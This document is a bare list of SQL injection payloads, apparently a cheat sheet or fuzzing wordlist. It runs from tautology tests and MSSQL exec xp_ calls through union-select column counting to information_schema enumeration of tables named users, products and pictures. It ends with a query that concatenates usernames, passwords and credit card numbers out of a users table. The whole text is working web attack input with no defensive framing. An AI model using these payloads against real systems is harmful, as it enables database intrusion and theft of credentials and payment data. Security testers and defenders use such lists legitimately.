1'1
1 exec sp_ (or exec xp_)
1 and 1=1
1 or 1=1
1' or '1'='1
1or1=1
1'or'1'='1
fake@ema'or'il.nl'='il.nl
1 union select 1--+
1 union select 1,2--+
1 union select 1,2,3--+
1 union select 1,2,3,4--+
1 union select 1,2,3,4,5--+
1 union select 1,2,3,4,5,6--+
1 union select 1,2,3,4,5,6,7--+
1 union select 1,2,3,4,5,6,7,8--+
1 union select 1,2,3,4,5,6,7,8,9--+
1 union select 1,2,3,4,5,6,7,8,9,10--+
1 union select 1,2,3,4,5,6,7,8,9,10,11--+
1 union select 1,2,3,4,5,6,7,8,9,10,11,12--+
1 union select 1,2,3,4,5,6,7,8,9,10,11,12,13--+
1 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14--+
1' union select 1--+
1' union select 1,2--+
1' union select 1,2,3--+
1' union select 1,2,3,4--+
1' union select 1,2,3,4,5--+
1' union select 1,2,3,4,5,6--+
1' union select 1,2,3,4,5,6,7--+
1' union select 1,2,3,4,5,6,7,8--+
1' union select 1,2,3,4,5,6,7,8,9--+
1' union select 1,2,3,4,5,6,7,8,9,10--+
1' union select 1,2,3,4,5,6,7,8,9,10,11--+
1' union select 1,2,3,4,5,6,7,8,9,10,11,12--+
1' union select 1,2,3,4,5,6,7,8,9,10,11,12,13--+
1' union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14--+
1 union select 1,2,3,4,5,table_name,7,8,9,10,11 from information_schema.tables--+
1 union select 1,2,3,4,5,6,table_name,8,9,10,11 from information_schema.tables--+
1 union select 1,2,3,4,5,6,7,table_name,9,10,11 from information_schema.tables--+
1 union select 1,2,3,4,5,6,7,8,column_name,10,11 from information_schema.columns where table_name='users'--+
1 union select 1,2,3,4,5,6,7,8,column_name,10,11 from information_schema.columns where table_name='products'--+
1 union select 1,2,3,4,5,6,7,8,column_name,10,11 from information_schema.columns where table_name='pictures'--+
1 union select 1,2,3,4,5,6,group_concat(uname,"//",pass,"//",cc),8,9,10,11 from users--+